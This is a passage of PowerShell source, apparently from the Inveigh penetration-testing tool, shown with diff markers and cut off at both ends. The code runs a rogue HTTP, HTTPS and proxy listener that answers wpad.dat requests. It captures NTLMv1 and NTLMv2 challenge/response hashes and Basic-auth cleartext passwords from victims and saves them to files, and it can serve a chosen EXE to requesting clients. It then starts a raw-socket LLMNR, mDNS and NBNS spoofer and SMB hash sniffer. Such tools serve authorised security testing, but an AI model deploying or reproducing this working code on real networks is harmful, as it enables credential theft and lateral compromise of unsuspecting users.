$DNS_domain_bytes.Length + $DNS_hostname_bytes.Length + 36)[0,1] + $target_offset = [System.BitConverter]::GetBytes($netBIOS_domain_bytes.Length + 56) + + $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 + + $netBIOS_domain_length + + $netBIOS_domain_length + + 0x38,0x00,0x00,0x00 + + $HTTP_NTLM_negotiation_flags + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $target_length + + $target_length + + $target_offset + + 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f + + $netBIOS_domain_bytes + + 0x02,0x00 + + $netBIOS_domain_length + + $netBIOS_domain_bytes + + 0x01,0x00 + + $hostname_length + + $hostname_bytes + + 0x04,0x00 + + $DNS_domain_length + + $DNS_domain_bytes + + 0x03,0x00 + + $DNS_hostname_length + + $DNS_hostname_bytes + + 0x05,0x00 + + $DNS_domain_length + + $DNS_domain_bytes + + 0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a + + $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) + $NTLM = "NTLM " + $NTLM_challenge_base64 + + return $NTLM + } + + if($HTTPS_listener) + { + $HTTP_type = "HTTPS" + } + elseif($proxy_listener) + { + $HTTP_type = "Proxy" + } + else + { + $HTTP_type = "HTTP" + } + + if($HTTPIP -ne '0.0.0.0') + { + $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) + $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) + } + else + { + $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) + } + + $HTTP_running = $true + $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_client_close = $true + + if($proxy_listener) + { + $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0) + $HTTP_listener.Server.LingerState = $HTTP_linger + } + + try + { + $HTTP_listener.Start() + } + catch + { + $HTTP_running = $false + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting $HTTP_type listener") > $null + } + + :HTTP_listener_loop while($inveigh.running -and $HTTP_running) + { + $TCP_request = $null + $TCP_request_bytes = New-Object System.Byte[] 4096 + $HTTP_send = $true + $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: text/html") + $HTTP_header_cache_control = $null + $HTTP_header_authenticate = $null + $HTTP_header_authenticate_data = $null + $HTTP_message = '' + $HTTP_header_authorization = '' + $HTTP_header_host = $null + $HTTP_header_user_agent = $null + $HTTP_request_raw_URL = $null + $NTLM = "NTLM" + + while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) + { + + Start-Sleep -m 10 + + if(!$inveigh.running) + { + break HTTP_listener_loop + } + + } + + if($HTTPS_listener) + { + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() + $HTTP_clear_stream = $HTTP_client.GetStream() + $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false) + $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN}) + $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false) + } + + [Byte[]]$SSL_request_bytes = $null + + do + { + $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)] + } while ($HTTP_clear_stream.DataAvailable) + + $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes) + } + else + { + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() + $HTTP_stream = $HTTP_client.GetStream() + } + + if($HTTP_stream.DataAvailable) + { + $HTTP_data_available = $true + } + else + { + $HTTP_data_available = $false + } + + while($HTTP_stream.DataAvailable) + { + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) > $null + } + + $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) + } + + if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*" -or $TCP_request -like "50-4f-53-54*") + { + $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) + $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_connection_header_close = $true + + if($NBNSBruteForcePause) + { + $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $inveigh.hostname_spoof = $true + } + + if($TCP_request -like "*-48-6F-73-74-3A-20-*") + { + $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19) + $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) + $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) + } + + if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") + { + $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) + } + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") > $null + + if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + { + $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") > $null + } + + } + + if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") + { + $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) + $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-")) + $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length) + } + + if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true + } + else + { + + if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM')) + { + $HTTPNTLMESS = $true + } + else + { + $HTTPNTLMESS = $false + } + + if($proxy_listener) + { + $HTTP_response_status_code = 0x34,0x30,0x37 + $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 + } + else + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 + } + + $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 + $HTTP_client_close = $false + } + + if($TCP_request -like "50-4f-53-54*") + { + $HTTP_POST_request_extract = $TCP_request.Substring($TCP_request.IndexOf("-0D-0A-0D-0A-") + 12) + $HTTP_POST_request_extract = $HTTP_POST_request_extract.Substring(0,$HTTP_POST_request_extract.IndexOf("-00-")) + $HTTP_POST_request_extract = $HTTP_POST_request_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_POST_request = New-Object System.String ($HTTP_POST_request_extract,0,$HTTP_POST_request_extract.Length) + + if($HTTP_POST_request_old -ne $HTTP_POST_request) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP") > $null + $inveigh.POST_request_file_queue.Add($HTTP_POST_request) > $null + $inveigh.POST_request_list.Add($HTTP_POST_request) > $null + } + + $HTTP_POST_request_old = $HTTP_POST_request + } + + if($HTTP_header_authorization.StartsWith('NTLM ')) + { + $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ','' + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization) + $HTTP_connection_header_close = $false + + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') + { + $NTLM = Get-NTLMChallengeBase64 $Challenge $HTTPNTLMESS $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port + } + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') + { + $HTTP_NTLM_length = Get-UInt16DataLength 20 $HTTP_request_bytes + $HTTP_NTLM_offset = Get-UInt32DataLength 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = Get-UInt16DataLength 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = Get-UInt32DataLength 32 $HTTP_request_bytes + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*' + $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) + $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) + + if($HTTP_NTLM_domain_length -eq 0) + { + $HTTP_NTLM_domain_string = $null + } + else + { + $HTTP_NTLM_domain_string = Convert-DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes + } + + $HTTP_NTLM_user_length = Get-UInt16DataLength 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = Get-UInt32DataLength 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = Convert-DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = Get-UInt16DataLength 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = Get-UInt32DataLength 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = Convert-DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string + + if($HTTP_NTLM_length -eq 24) # NTLMv1 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(48,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null + } + else + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) + { + $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null + } + + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") + { + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null + } + + } + + } + else # NTLMv2 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(32,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null + } + else + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) + { + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) > $null + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null + } + + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") + { + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null + } + + } + + } + + if($HTTP_NTLM_domain_string -and $HTTP_NTLM_user_string -and $HTTP_NTLM_host_string -and $HTTP_source_IP) + { + Invoke-SessionUpdate $HTTP_NTLM_domain_string $HTTP_NTLM_user_string $HTTP_NTLM_host_string $HTTP_source_IP + } + + if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($HTTP_source_IP) > $null + } + + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_client_close = $true + $NTLM_challenge = $null + + if($proxy_listener) + { + + if($HTTPResponse -or $HTTPDir) + { + $HTTP_header_cache_control = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x2c,0x20,0x6e,0x6f,0x2d,0x73,0x74,0x6f,0x72,0x65 + } + else + { + $HTTP_send = $false + } + + } + + } + else + { + $HTTP_client_close = $true + } + + } + elseif($HTTP_header_authorization.startswith('Basic ')) + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ','' + $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization)) + $HTTP_client_close = $true + $inveigh.cleartext_file_queue.Add($cleartext_credentials) > $null + $inveigh.cleartext_list.Add($cleartext_credentials) > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") > $null + + if($inveigh.file_output) + { + $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) > $null + } + + } + + if(($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or ( + $WPADAuthIgnore.Count -gt 0 -and $WPADAuth -like 'NTLM*' -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})) -or $HTTP_client_close) + { + + if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url))) + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE)) + $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: application/exe") + } + elseif($HTTPDir) + { + + if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $HTTP_request_raw_url -notmatch '/wpad.dat') + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) + } + elseif(($HTTPDefaultFile -and $HTTP_request_raw_url -eq '' -or $HTTPDefaultFile -and $HTTP_request_raw_url -eq '/') -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile))) + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) + } + elseif($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat') + { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse) + $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: application/x-ns-proxy-autoconfig") + } + else + { + + if(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) + { + [Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTP_request_raw_url)) + } + else + { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse) + } + + } + + } + else + { + + if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))) + { + $HTTP_message = $WPADResponse + $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: application/x-ns-proxy-autoconfig") + } + elseif($HTTPResponse) + { + $HTTP_message = $HTTPResponse + + if($HTTPContentType) + { + $HTTP_header_content_type = [System.Text.Encoding]::UTF8.GetBytes("Content-Type: $HTTPContentType") + } + + } + + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + } + + } + else + { + [Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + } + + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + + if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close) + { + $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM) + } + elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) + { + $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") + } + + $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary + $packet_HTTPResponse.Add("HTTPResponse_ResponseVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)) + $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20)) + $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a)) + + if($HTTP_connection_header_close) + { + $HTTP_connection_header = [System.Text.Encoding]::UTF8.GetBytes("Connection: close") + $packet_HTTPResponse.Add("HTTPResponse_Connection",$HTTP_connection_header + [Byte[]](0x0d,0x0a)) + } + + $packet_HTTPResponse.Add("HTTPResponse_Server",[System.Text.Encoding]::UTF8.GetBytes("Server: Microsoft-HTTPAPI/2.0") + [Byte[]](0x0d,0x0a)) + $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a)) + $packet_HTTPResponse.Add("HTTPResponse_ContentLength",[System.Text.Encoding]::UTF8.GetBytes("Content-Length: $($HTTP_message_bytes.Length)") + [Byte[]](0x0d,0x0a)) + + if($HTTP_header_authenticate -and $HTTP_header_authenticate_data) + { + $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_header_content_type) + { + $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_header_cache_control) + { + $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a)) + } + + if($HTTP_send) + { + $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes) + $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + } + + Start-Sleep -m 10 + $HTTP_request_raw_URL_old = $HTTP_request_raw_URL + $HTTP_client_handle_old = $HTTP_client.Client.Handle + + if($HTTP_client_close) + { + + if($proxy_listener) + { + $HTTP_client.Client.Close() + } + else + { + $HTTP_client.Close() + } + + } + + } + else + { + + if($HTTP_client_handle_old -eq $HTTP_client.Client.Handle) + { + $HTTP_reset++ + } + else + { + $HTTP_reset = 0 + } + + if($HTTP_data_available -or $HTTP_connection_header_close -or $HTTP_reset -gt 20) + { + $HTTP_client.Close() + $HTTP_client_close = $true + $HTTP_reset = 0 + } + else + { + Start-Sleep -m 100 + } + + } + + } + + $HTTP_client.Close() + start-sleep -s 1 + $HTTP_listener.Server.Blocking = $false + Start-Sleep -s 1 + $HTTP_listener.Server.Close() + Start-Sleep -s 1 + $HTTP_listener.Stop() +} + +# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer +$sniffer_scriptblock = +{ + param ($EvadeRG,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL, + $NBNS,$NBNS_response_message,$NBNSTTL,$NBNSTypes,$SMB,$SpooferHostsIgnore,$SpooferHostsReply, + $SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,$SpooferLearning,$SpooferLearningDelay, + $SpooferLearningInterval,$SpooferNonprintable,$SpooferThresholdHost,$SpooferThresholdNetwork) + + $sniffer_running = $true + $byte_in = New-Object System.Byte[] 4 + $byte_out = New-Object System.Byte[] 4 + $byte_data = New-Object System.Byte[] 4096 + $byte_in[0] = 1 + $byte_in[1-3] = 0 + $byte_out[0] = 1 + $byte_out[1-3] = 0 + $sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) + $sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true) + $sniffer_socket.ReceiveBufferSize = 4096 + + try + { + $end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0) + } + catch + { + $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting sniffer/spoofer") > $null + $sniffer_running = $false + } + + $sniffer_socket.Bind($end_point) + $sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out) + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) + $mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL) + [Array]::Reverse($mDNS_TTL_bytes) + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + $LLMNR_learning_log = New-Object System.Collections.Generic.List[string] + $NBNS_learning_log = New-Object System.Collections.Generic.List[string] + + if($SpooferLearningDelay) + { + $spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay + $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + while($inveigh.running -and $sniffer_running) + { + $packet_data = $sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None) + $memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data) + $binary_reader = New-Object System.IO.BinaryReader($memory_stream) + $version_HL = $binary_reader.ReadByte() + $binary_reader.ReadByte() > $null + $total_length = Convert-DataToUInt16 $binary_reader.ReadBytes(2) + $binary_reader.ReadBytes(5) > $null + $protocol_number = $binary_reader.ReadByte() + $binary_reader.ReadBytes(2) > $null + $source_IP_bytes = $binary_reader.ReadBytes(4) + $source_IP = [System.Net.IPAddress]$source_IP_bytes + $destination_IP_bytes = $binary_reader.ReadBytes(4) + $destination_IP = [System.Net.IPAddress]$destination_IP_bytes + $header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4 + + switch($protocol_number) + { + + 6 + { # TCP + $source_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2) + $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2) + $binary_reader.ReadBytes(8) > $null + $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 + $binary_reader.ReadBytes(7) > $null + $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) + switch ($destination_port) + { + + 139 + { + if($SMB -eq 'Y') + { + + if($payload_bytes) + { + Get-SMBConnection $payload_bytes $IP $source_IP $source_port "139" + } + + if($inveigh.SMB_session_table."$source_IP`:$source_port") + { + Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port" + } + + } + } + + 445 + { + + if($SMB -eq 'Y') + { + + if($payload_bytes) + { + Get-SMBConnection $payload_bytes $IP $source_IP $source_port "445" + } + + if($inveigh.SMB_session_table."$source_IP`:$source_port") + { + Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port" + } + + } + + } + + } + + # Outgoing packets + switch ($source_port) + { + + 139 + { + + if($SMB -eq 'Y') + { + + if($payload_bytes) + { + $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes + } + + if($NTLM_challenge) + { + $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge + $NTLM_challenge = $null + } + + } + + } + + 445 + { + + if($SMB -eq 'Y') + { + + if($payload_bytes) + { + $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes + } + + if($NTLM_challenge -and $destination_IP -ne $source_IP) + { + $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge + $NTLM_challenge = $null + } + + } + + } + + } + + } + + 17 + { # UDP + $source_port = $binary_reader.ReadBytes(2) + $endpoint_source_port = Convert-DataToUInt16 ($source_port) + $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2) + $UDP_length = $binary_reader.ReadBytes(2) + $UDP_length_uint = Convert-DataToUInt16 ($UDP_length) + $binary_reader.ReadBytes(2) > $null + $payload_bytes = 